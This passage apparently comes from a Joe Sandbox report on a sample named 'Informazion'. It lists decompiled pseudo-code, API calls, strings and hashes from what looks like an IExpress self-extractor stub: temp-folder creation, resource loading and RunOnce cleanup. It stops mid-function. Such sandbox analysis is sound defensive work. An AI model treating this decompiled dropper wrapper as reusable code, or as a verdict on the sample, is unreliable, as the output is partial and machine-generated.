                                                     Instruction addresses, one per decompiled line above, in order: 0x7ff64c51204c, 0x7ff64c512051, 0x7ff64c51205a, 0x7ff64c512062, 0x7ff64c512069, 0x7ff64c512073, 0x7ff64c512080, 0x7ff64c512086, 0x7ff64c512093, 0x7ff64c51209a, 0x7ff64c5120a7, 0x7ff64c5120a9, 0x7ff64c5120ac, 0x7ff64c5120ae, 0x7ff64c5120b0, 0x7ff64c5120b9, 0x7ff64c5120cc, 0x7ff64c5120d4, 0x7ff64c5120d7, 0x7ff64c5120e5, 0x7ff64c5120f8, 0x7ff64c512101, 0x7ff64c51210f, 0x7ff64c512111, 0x7ff64c512114, 0x7ff64c512116, 0x7ff64c512118, 0x7ff64c51211a, 0x7ff64c512121, 0x7ff64c51212a, 0x7ff64c512133, 0x7ff64c512136, 0x7ff64c512152, 0x7ff64c512172, 0x7ff64c512180, 0x7ff64c512193, 0x7ff64c51219c, 0x7ff64c5121a1, 0x7ff64c5121af, 0x7ff64c5121bd, 0x7ff64c5121cd, 0x7ff64c5121e1, 0x7ff64c5121ef, 0x7ff64c5121f8, 0x7ff64c512207, 0x7ff64c512239

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                     • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                    • String ID:
                                                    • API String ID: 836429354-0
                                                    • Opcode ID: c26e249b4af3392c0508b032d5f49962cae78291bc0a3ebcf72e5c6c276314af
                                                    • Instruction ID: d6f8028b0dd1b6fce9161af158e11c56441cdefbaa459acc9f66b91d68158a2d
                                                    • Opcode Fuzzy Hash: c26e249b4af3392c0508b032d5f49962cae78291bc0a3ebcf72e5c6c276314af
                                                    • Instruction Fuzzy Hash: 96515E25A0CA858AEB15BF24E8482FD6BA1FB45B94F844172DA6D83799DF3CD519C300
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                     • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                    • Instruction ID: 0dbf36e9131862b72be0557867005d52e74686fba62dce42004ff1240dc4298c
                                                    • Opcode Fuzzy Hash: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                    • Instruction Fuzzy Hash: 83B09210E29402C1D608BF269C8906827A0BB58304FC10832C01DC0220DE5C92AA8700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 28%
                                                    			E00007FF67FF64C5161EC(long long __rbx, void* __rdx, long long _a8) {
                                                    				signed int _v24;
                                                    				char _v296;
                                                    				char _v312;
                                                    				long long _v328;
                                                    				signed int _t23;
                                                    				char _t24;
                                                    				signed int _t28;
                                                    				long _t29;
                                                    				long _t31;
                                                    				void* _t34;
                                                    				char _t44;
                                                    				void* _t47;
                                                    				signed long long _t52;
                                                    				intOrPtr _t60;
                                                    				intOrPtr _t61;
                                                    				char* _t67;
                                                    				void* _t68;
                                                    				void* _t82;
                                                    				void* _t83;
                                                    
                                                    				_t77 = __rdx;
                                                    				_a8 = __rbx;
                                                    				_t52 =  *0x4c51c008; // 0xdeba5460e397
                                                    				_v24 = _t52 ^ _t83 - 0x00000160;
                                                    				_t60 =  *0x4c51d608; // 0x22759540b30
                                                    				goto 0x4c51626e;
                                                    				if ( *0x4c51cd04 != 0) goto 0x4c51624c;
                                                    				if ( *0x4c51de60 != 0) goto 0x4c51624c;
                                                    				SetFileAttributesA(??, ??); // executed
                                                    				DeleteFileA(??); // executed
                                                    				_t61 =  *((intOrPtr*)(_t60 + 8));
                                                    				LocalFree(??);
                                                    				LocalFree(??);
                                                    				if (_t61 != 0) goto 0x4c516214;
                                                    				_t23 =  *0x4c51cd00; // 0x0
                                                    				if (_t23 == 0) goto 0x4c516317;
                                                    				if ( *0x4c51cd04 != 0) goto 0x4c516317;
                                                    				if ( *0x4c51de60 != 0) goto 0x4c516317;
                                                    				_t67 =  &_v296;
                                                    				_t6 = _t77 + 0x7ffffefa; // 0x7ffffffe
                                                    				if (_t6 == 0) goto 0x4c5162d3;
                                                    				_t24 =  *((intOrPtr*)(0x4c51d610 -  &_v296 + _t67));
                                                    				_t44 = _t24;
                                                    				if (_t44 == 0) goto 0x4c5162d3;
                                                    				 *_t67 = _t24;
                                                    				_t68 = _t67 + _t61;
                                                    				_t78 = __rdx - _t61;
                                                    				if (_t44 != 0) goto 0x4c5162b5;
                                                    				_t57 =  !=  ? _t68 : _t68 - 1;
                                                    				 *((char*)( !=  ? _t68 : _t68 - 1)) = 0;
                                                    				if (( *0x4c51de64 & 0x00000020) == 0) goto 0x4c5162f4;
                                                    				E00007FF67FF64C517C40( !=  ? _t68 : _t68 - 1, _t61,  &_v296, __rdx - _t61, _t82);
                                                    				SetCurrentDirectoryA(??); // executed
                                                    				E00007FF67FF64C51204C(_t61,  &_v296, _t78, _t82);
                                                    				_t28 =  *0x4c51cd00; // 0x0
                                                    				_t47 =  *0x4c51de78 - 1; // 0x3
                                                    				if (_t47 == 0) goto 0x4c516387;
                                                    				if (_t28 == 0) goto 0x4c516387;
                                                    				if ( *0x4c51c7d0 == 0) goto 0x4c516387;
                                                    				r9d = 0x20006;
                                                    				r8d = 0;
                                                    				_v328 =  &_v312;
                                                    				_t29 = RegOpenKeyExA(??, ??, ??, ??, ??); // executed
                                                    				if (_t29 != 0) goto 0x4c516387;
                                                    				RegDeleteValueA(??, ??); // executed
                                                    				_t31 = RegCloseKey(??);
                                                    				 *0x4c51cd00 =  *0x4c51cd00 & 0x00000000;
                                                    				return E00007FF67FF64C518470(_t31, _t34, _v24 ^ _t83 - 0x00000160);
                                                     			}

                                                     Instruction addresses, one per decompiled line above, in order: 0x7ff64c5161ec, 0x7ff64c5161ec, 0x7ff64c5161f9, 0x7ff64c516203, 0x7ff64c51620b, 0x7ff64c516212, 0x7ff64c51621e, 0x7ff64c516227, 0x7ff64c516231, 0x7ff64c516240, 0x7ff64c51624f, 0x7ff64c516253, 0x7ff64c516262, 0x7ff64c516271, 0x7ff64c516273, 0x7ff64c516280, 0x7ff64c51628d, 0x7ff64c51629a, 0x7ff64c5162b0, 0x7ff64c5162b5, 0x7ff64c5162bf, 0x7ff64c5162c1, 0x7ff64c5162c5, 0x7ff64c5162c7, 0x7ff64c5162c9, 0x7ff64c5162cb, 0x7ff64c5162ce, 0x7ff64c5162d1, 0x7ff64c5162da, 0x7ff64c5162e5, 0x7ff64c5162e8, 0x7ff64c5162ef, 0x7ff64c5162fb, 0x7ff64c51630c, 0x7ff64c516311, 0x7ff64c516317, 0x7ff64c51631e, 0x7ff64c516322, 0x7ff64c51632b, 0x7ff64c516332, 0x7ff64c516338, 0x7ff64c51633b, 0x7ff64c51634e, 0x7ff64c51635c, 0x7ff64c51636a, 0x7ff64c51637b, 0x7ff64c516387, 0x7ff64c5163ae

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                     • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                    • API String ID: 3049360512-3137473940
                                                    • Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                    • Instruction ID: 94b9cdb525135e36a29d60f0afd0270da6c40700a7852675dc9f55dc7e1d973a
                                                    • Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                    • Instruction Fuzzy Hash: 63510921E1C68286EB19BF18E8483BD7FA0FB85B45F444132CA6D83794CF6DE868C700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                    • String ID:
                                                    • API String ID: 3183975587-3916222277
                                                    • Opcode ID: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                                    • Instruction ID: 8e59ad0c81c0bca3a7e5ed40af9ebd5fa73b74dad34f2b30c51fbc941b4392d4
                                                    • Opcode Fuzzy Hash: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                                    • Instruction Fuzzy Hash: F7512C32D1C6818AE768BF18E45837EBBA0FB88755F045236D66D867A5CF7CD464CB00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: OpenQuery$CloseInfoValue
                                                    • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                    • API String ID: 2209512893-559176071
                                                    • Opcode ID: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                    • Instruction ID: 2f6576357d7aae7eb32cdb8f15e408b87da1dcec69eb8826135c6efcd48d0ccc
                                                    • Opcode Fuzzy Hash: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                    • Instruction Fuzzy Hash: 75316F32A0CB81CAD724AF29F8445BDBBA4FB88754F444536EA6D83B58DF38D560CB00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 45%
                                                    			E00007FF67FF64C5163B8(long long __rbx, void* __rcx, void* __rdx, void* __r9, void* __r10, long long _a24) {
                                                    				signed int _v40;
                                                    				char _v312;
                                                    				void* __rsi;
                                                    				void* __rbp;
                                                    				long _t11;
                                                    				void* _t19;
                                                    				signed long long _t30;
                                                    				void* _t48;
                                                    				void* _t49;
                                                    				void* _t50;
                                                    
                                                    				_a24 = __rbx;
                                                    				_t30 =  *0x4c51c008; // 0xdeba5460e397
                                                    				_v40 = _t30 ^ _t50 - 0x00000140;
                                                    				_t49 = __rcx;
                                                    				r9d = 0;
                                                    				_t3 =  &_v312; // 0xf4
                                                    				E00007FF67FF64C51114C(_t3, __rdx, "IXP%03d.TMP", __r9);
                                                    				E00007FF67FF64C511008(__rdx, __rdx, _t49, __r10);
                                                    				_t4 =  &_v312; // 0xf4
                                                    				E00007FF67FF64C517BA8(0x104, _t30 ^ _t50 - 0x00000140, __rbx, __rdx, _t48, _t49, _t4); // executed
                                                    				RemoveDirectoryA(??); // executed
                                                    				_t11 = GetFileAttributesA(??); // executed
                                                    				if (_t11 == 0xffffffff) goto 0x4c5164b6;
                                                    				if (1 - 0x190 < 0) goto 0x4c5163e3;
                                                    				r8d = 0;
                                                    				if (GetTempFileNameA(??, ??, ??, ??) == 0) goto 0x4c516490;
                                                    				DeleteFileA(??);
                                                    				CreateDirectoryA(??, ??);
                                                    				return E00007FF67FF64C518470(1, _t19, _v40 ^ _t50 - 0x00000140);
                                                    			}

                                                    Instruction addresses (one per statement above): 0x7ff64c5163b8, 0x7ff64c5163c7, 0x7ff64c5163d1, 0x7ff64c5163e0, 0x7ff64c5163e3, 0x7ff64c5163f2, 0x7ff64c5163f7, 0x7ff64c516409, 0x7ff64c51640e, 0x7ff64c51641b, 0x7ff64c516423, 0x7ff64c516432, 0x7ff64c516441, 0x7ff64c516449, 0x7ff64c516455, 0x7ff64c516469, 0x7ff64c516473, 0x7ff64c516484, 0x7ff64c5164b4

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                    • String ID: IXP$IXP%03d.TMP
                                                    • API String ID: 1082909758-3932986939
                                                    • Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                    • Instruction ID: b611ce5ffd520ca22aca8f4f9211ba3c420ab8893fdf453a13adac5b33f41683
                                                    • Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                    • Instruction Fuzzy Hash: B6216131E0C98186E618BF1AA9983FDAE91FB8DB90F848132DD6E83795CF3CD455C600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 639 7ff64c518200-7ff64c518249 call 7ff64c518964 GetStartupInfoW 643 7ff64c51824b-7ff64c518256 639->643 644 7ff64c518258-7ff64c51825b 643->644 645 7ff64c518262-7ff64c51826b 643->645 646 7ff64c518277-7ff64c518282 Sleep 644->646 647 7ff64c51825d 644->647 648 7ff64c51826d-7ff64c518275 _amsg_exit 645->648 649 7ff64c518284-7ff64c51828c 645->649 646->643 647->645 650 7ff64c5182f1-7ff64c5182fa 648->650 651 7ff64c5182e7 649->651 652 7ff64c51828e-7ff64c5182ab 649->652 654 7ff64c518319-7ff64c51831b 650->654 655 7ff64c5182fc-7ff64c51830f _initterm 650->655 651->650 653 7ff64c5182af-7ff64c5182b2 652->653 658 7ff64c5182d9-7ff64c5182db 653->658 659 7ff64c5182b4-7ff64c5182b6 653->659 656 7ff64c518326-7ff64c51832e 654->656 657 7ff64c51831d-7ff64c51831f 654->657 655->654 660 7ff64c51835a-7ff64c518369 656->660 661 7ff64c518330-7ff64c51833e call 7ff64c5188d0 656->661 657->656 658->650 663 7ff64c5182dd-7ff64c5182e2 658->663 662 7ff64c5182b8-7ff64c5182bc 659->662 659->663 667 7ff64c51836d-7ff64c518373 660->667 661->660 672 7ff64c518340-7ff64c518350 661->672 665 7ff64c5182ce-7ff64c5182d7 662->665 666 7ff64c5182be-7ff64c5182c8 call 7ff64c518790 662->666 668 7ff64c518444-7ff64c518459 663->668 665->653 675 7ff64c5182ca 666->675 670 7ff64c5183e6-7ff64c5183e9 667->670 671 7ff64c518375-7ff64c518377 667->671 673 7ff64c5183f8-7ff64c518400 _ismbblead 670->673 674 7ff64c5183eb-7ff64c5183f4 670->674 676 7ff64c518379-7ff64c51837b 671->676 677 7ff64c51837d-7ff64c518382 671->677 672->660 678 7ff64c51840a-7ff64c518412 673->678 679 7ff64c518402-7ff64c518405 673->679 674->673 675->665 676->670 676->677 680 7ff64c518390-7ff64c5183c5 call 7ff64c512c54 677->680 681 7ff64c518384-7ff64c51838e 677->681 678->667 678->668 679->678 684 7ff64c5183c7-7ff64c5183c9 exit 680->684 685 7ff64c5183cf-7ff64c5183d6 680->685 681->677 684->685 686 7ff64c5183d8-7ff64c5183de _cexit 685->686 687 7ff64c5183e4 685->687 686->687 687->668
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                    • String ID:
                                                    • API String ID: 2995914023-0
                                                    • Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                    • Instruction ID: e5856798610a6ed7ae0d4860c1988286ff1a6a850afe43534c43c47470eff091
                                                    • Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                    • Instruction Fuzzy Hash: 70511631E0CA4286E768BF29E85837D2BA0BB44794F990036D96DC23A5DF3DE965C601
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 56%
                                                    			E00007FF67FF64C5160A4(void* __rax, long long __rbx, void* __rdx, void* __rsi, void* __rbp, void* __r8, void* __r9, void* __r10, long long _a8) {
                                                    				signed int _v16;
                                                    				intOrPtr _v24;
                                                    				void* _t12;
                                                    				signed int _t13;
                                                    				signed int _t16;
                                                    				int _t19;
                                                    				void* _t22;
                                                    				void* _t53;
                                                    				void* _t59;
                                                    
                                                    				_t59 = __r8;
                                                    				_t55 = __rbp;
                                                    				_t54 = __rsi;
                                                    				_t42 = __rbx;
                                                    				_t41 = __rax;
                                                    				_a8 = __rbx;
                                                    				r8d = 0;
                                                    				_t12 = E00007FF67FF64C515050(__rax, __rbx, "UPROMPT", __rdx, __rsi, __rbp);
                                                    				_t13 = LocalAlloc(??, ??);
                                                    				_t53 = __rax;
                                                    				if (__rax != 0) goto 0x4c51610b;
                                                    				_v16 = _v16 & _t13;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				_v24 = 0x10;
                                                    				E00007FF67FF64C514DCC("UPROMPT", _t59, __r9, __r10);
                                                    				 *0x4c51d544 = E00007FF67FF64C517700();
                                                    				goto 0x4c5161d5;
                                                    				r8d = _t12;
                                                    				_t16 = E00007FF67FF64C515050(_t41, _t42, "UPROMPT", _t53, _t54, _t55);
                                                    				if (_t16 != 0) goto 0x4c51615a;
                                                    				_v16 = _v16 & _t16;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				_v24 = 0x10;
                                                    				E00007FF67FF64C514DCC("UPROMPT", _t59, __r9, __r10);
                                                    				LocalFree(??);
                                                    				 *0x4c51d544 = 0x80070714;
                                                    				goto 0x4c5161d5;
                                                    				_t19 = lstrcmpA(??, ??); // executed
                                                    				if (_t19 != 0) goto 0x4c51618a;
                                                    				LocalFree(??);
                                                    				goto 0x4c5161d7;
                                                    				_v16 = 4;
                                                    				r9d = 0;
                                                    				_v24 = 0x20;
                                                    				_t22 = E00007FF67FF64C514DCC(_t53, _t53, __r9, __r10);
                                                    				LocalFree(??);
                                                    				if (_t22 != 6) goto 0x4c5161cb;
                                                    				 *0x4c51d544 =  *0x4c51d544 & 0x00000000;
                                                    				goto 0x4c516183;
                                                    				 *0x4c51d544 = 0x800704c7;
                                                    				return 0;
                                                    			}

                                                    Instruction addresses (one per statement above): 0x7ff64c5160a4, 0x7ff64c5160a4, 0x7ff64c5160a4, 0x7ff64c5160a4, 0x7ff64c5160a4, 0x7ff64c5160a4, 0x7ff64c5160ae, 0x7ff64c5160ba, 0x7ff64c5160c9, 0x7ff64c5160d5, 0x7ff64c5160db, 0x7ff64c5160dd, 0x7ff64c5160e1, 0x7ff64c5160e4, 0x7ff64c5160e7, 0x7ff64c5160f6, 0x7ff64c516100, 0x7ff64c516106, 0x7ff64c51610b, 0x7ff64c516118, 0x7ff64c51611f, 0x7ff64c516121, 0x7ff64c516125, 0x7ff64c516128, 0x7ff64c51612b, 0x7ff64c51613a, 0x7ff64c516142, 0x7ff64c51614e, 0x7ff64c516158, 0x7ff64c516164, 0x7ff64c516172, 0x7ff64c516177, 0x7ff64c516188, 0x7ff64c51618a, 0x7ff64c516192, 0x7ff64c516198, 0x7ff64c5161a7, 0x7ff64c5161b1, 0x7ff64c5161c0, 0x7ff64c5161c2, 0x7ff64c5161c9, 0x7ff64c5161cb, 0x7ff64c5161e1

                                                    APIs
                                                      • Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C515078
                                                      • Part of subcall function 00007FF64C515050: SizeofResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C515089
                                                      • Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C5150AF
                                                      • Part of subcall function 00007FF64C515050: LoadResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150C0
                                                      • Part of subcall function 00007FF64C515050: LockResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150CF
                                                      • Part of subcall function 00007FF64C515050: memcpy_s.MSVCRT ref: 00007FF64C5150EE
                                                      • Part of subcall function 00007FF64C515050: FreeResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150FD
                                                    • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF64C513123), ref: 00007FF64C5160C9
                                                    • LocalFree.KERNEL32 ref: 00007FF64C516142
                                                      • Part of subcall function 00007FF64C514DCC: LoadStringA.USER32 ref: 00007FF64C514E60
                                                      • Part of subcall function 00007FF64C514DCC: MessageBoxA.USER32 ref: 00007FF64C514EA0
                                                      • Part of subcall function 00007FF64C517700: GetLastError.KERNEL32 ref: 00007FF64C517704
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                    • String ID: $<None>$UPROMPT
                                                    • API String ID: 957408736-2569542085
                                                    • Opcode ID: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                    • Instruction ID: e2026e9860f742bdc75ab8fa5e6117787545f27452bd8277ea0adc232ac5be76
                                                    • Opcode Fuzzy Hash: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                    • Instruction Fuzzy Hash: 7D31A175E1C6428BF728BF28E55837E7E60EB85794F405536CA2E82795DF7CD4248B00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: CreateFile$lstrcmp
                                                    • String ID: *MEMCAB
                                                    • API String ID: 1301100335-3211172518
                                                    • Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                    • Instruction ID: 2aeea1c46d981045f8be290d3a0b91c245fe18b97ab8a596e231c04aef9b6500
                                                    • Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                    • Instruction Fuzzy Hash: A561C362E0C78186F768BF19A48837D7E91EB45B64F854332CA7E827C1DF7CA4258600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 57%
                                                    			E00007FF67FF64C5158B0(void* __ecx, void* __ebp, long long __rbx, void* __rdx, long long __rdi, long long __rsi) {
                                                    				void* __rbp;
                                                    				int _t48;
                                                    				int _t50;
                                                    				int _t52;
                                                    				void* _t56;
                                                    				void* _t62;
                                                    				void* _t65;
                                                    				intOrPtr _t75;
                                                    				void* _t77;
                                                    				void* _t98;
                                                    				signed long long _t99;
                                                    				void* _t105;
                                                    				void* _t108;
                                                    				intOrPtr _t119;
                                                    				CHAR* _t140;
                                                    				void* _t143;
                                                    				FILETIME* _t153;
                                                    				signed long long _t154;
                                                    				void* _t156;
                                                    
                                                    				_t138 = __rsi;
                                                    				_t62 = __ecx;
                                                    				_t98 = _t143;
                                                    				 *((long long*)(_t98 + 8)) = __rbx;
                                                    				 *((long long*)(_t98 + 0x18)) = __rsi;
                                                    				 *((long long*)(_t98 + 0x20)) = __rdi;
